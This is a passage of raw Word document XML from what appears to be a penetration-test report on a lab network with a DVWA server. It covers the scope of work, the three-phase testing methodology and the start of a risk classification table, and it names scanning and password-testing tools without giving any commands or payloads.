                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A252DE">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>192.168.57.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="358DF828" w14:textId="77777777" w:rsidR="00A252DE" w:rsidRDefault="00A252DE" w:rsidP="28E2C82A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A252DE">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>TechShield</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A252DE">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t xml:space="preserve"> Lab Network – includes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ED0E9FE" w14:textId="77777777" w:rsidR="00A252DE" w:rsidRDefault="00A252DE" w:rsidP="28E2C82A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A252DE">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t xml:space="preserve">Victim-Laptop (192.168.57.20) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F31D2D0" w14:textId="52ADC0F9" w:rsidR="00475B86" w:rsidRDefault="00A252DE" w:rsidP="28E2C82A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:vertAlign w:val="superscript"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A252DE">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>DVWA Application Server (192.168.57.30).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F811BF4" w14:textId="49BD7931" w:rsidR="00803467" w:rsidRDefault="00803467" w:rsidP="00803467">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_1guor7qepakl" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidRPr="00803467">
        <w:t>Scope of Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671A1B35" w14:textId="4D009A8D" w:rsidR="00803467" w:rsidRDefault="00CF16D7" w:rsidP="00803467">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF16D7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>The scope of work for this assessment included the following activities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2E7D84" w14:textId="77777777" w:rsidR="00187DA5" w:rsidRDefault="00187DA5" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187DA5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Vulnerability Assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="00187DA5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00187DA5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>Netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00187DA5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">, Nmap, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00187DA5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>Greenbone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00187DA5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>/OpenVAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752EA85B" w14:textId="77777777" w:rsidR="00187DA5" w:rsidRDefault="00187DA5" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187DA5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web Application Security Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00187DA5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> against DVWA to validate exposure to SQL injection, XSS, file upload flaws, and payload exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA1DB73" w14:textId="77777777" w:rsidR="00187DA5" w:rsidRDefault="00187DA5" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187DA5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Password Security Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00187DA5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Hydra to highlight weak credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6631F2C2" w14:textId="65DA8C0F" w:rsidR="00475B86" w:rsidRDefault="00187DA5" w:rsidP="0047080B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0047080B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Digital Forensic Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="0047080B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Autopsy to verify hash integrity and recover hidden JPG evidence files from a compromised image.</w:t>
      </w:r>
      <w:bookmarkStart w:id="15" w:name="_kfuezk755tht" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidR="00922DBC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1321EC22" w14:textId="77777777" w:rsidR="006D54ED" w:rsidRDefault="006D54ED" w:rsidP="006D54ED">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_tt2dclm9r0d3"/>
      <w:bookmarkStart w:id="17" w:name="_Toc1242599161"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TESTING METHODOLOGY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="7BE8C32A" w14:textId="2121711B" w:rsidR="00F73D4D" w:rsidRPr="00F73D4D" w:rsidRDefault="00F73D4D" w:rsidP="00F73D4D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">My testing methodology was split into three phases: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Reconnaissance, Target Assessment, and Execution of Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9419B2" w14:textId="77777777" w:rsidR="00F73D4D" w:rsidRPr="00F73D4D" w:rsidRDefault="00F73D4D" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">: I gathered information about </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>TechShield’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> network systems using discovery tools such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Nmap. This phase helped identify live hosts, open ports, operating systems, and running services within the 192.168.57.0/24 lab network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA89D1" w14:textId="77777777" w:rsidR="00F73D4D" w:rsidRPr="00F73D4D" w:rsidRDefault="00F73D4D" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Target Assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>: I refined the information collected during reconnaissance and used it to assess target systems. This included vulnerability scanning with Greenbone/OpenVAS, enumeration of user accounts and services, and the identification of weak points in both the Victim-Laptop and the Application Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0876140F" w14:textId="77777777" w:rsidR="00F73D4D" w:rsidRPr="00F73D4D" w:rsidRDefault="00F73D4D" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Execution of Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">: I simulated attacker techniques to safely exploit vulnerabilities in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>TechShield’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F73D4D">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment. This included exploiting DVWA web application flaws (SQL Injection, XSS, File Upload), testing weak credentials with Hydra, and conducting forensic analysis with Autopsy. Evidence of vulnerabilities was collected at each step while ensuring testing did not disrupt normal business operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10823970" w14:textId="77777777" w:rsidR="00A80D68" w:rsidRDefault="00A80D68" w:rsidP="006D54ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58EF2722" w14:textId="11DAC347" w:rsidR="006D54ED" w:rsidRDefault="006D54ED" w:rsidP="006D54ED">
      <w:r w:rsidRPr="28E2C82A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following image is a graphical representation of this methodology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E97E82F" w14:textId="22DDD4A7" w:rsidR="00930DEC" w:rsidRDefault="00740AD2" w:rsidP="006D54ED">
      <w:bookmarkStart w:id="18" w:name="_Hlk212201774"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3333D5D2" wp14:editId="74B3A0B4">
            <wp:extent cx="5486400" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="19050" b="0"/>
            <wp:docPr id="206637953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CB0F69F" w14:textId="1D668F59" w:rsidR="006D54ED" w:rsidRPr="00861FCC" w:rsidRDefault="00D15C21" w:rsidP="00861FCC">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D44E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="0036509C" w:rsidRPr="004D44E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="004D44E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00050877">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Three-phase testing methodology used in the assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D69BAA" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc1239310010"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CLASSIFICATION DEFINITIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="1F1E975C" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc1359605257"/>
      <w:r>
        <w:t>Risk Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="92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410"/>
        <w:gridCol w:w="6255"/>
      </w:tblGrid>
      <w:tr w:rsidR="00444C92" w14:paraId="71274B20" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:trHeight w:val="603"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="73A16CA6" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="12D22068" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2231F240" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="0C88D26F" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:trHeight w:val="612"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605"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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B7A0E94"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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="648DF24B" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="674EA7"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="34951FBB" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="A61C00"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="A61C00"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="57EF25C5" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="28E2C82A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="28E2C82A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The vulnerability poses an immediate threat to the organization. Successful exploitation may permanently affect the organization. Remediation should be immediately performed. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="228A53E9" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:trHeight w:val="747"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="A61C00"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77FD93F5"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="56222194" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="E06666"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="766F031A" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
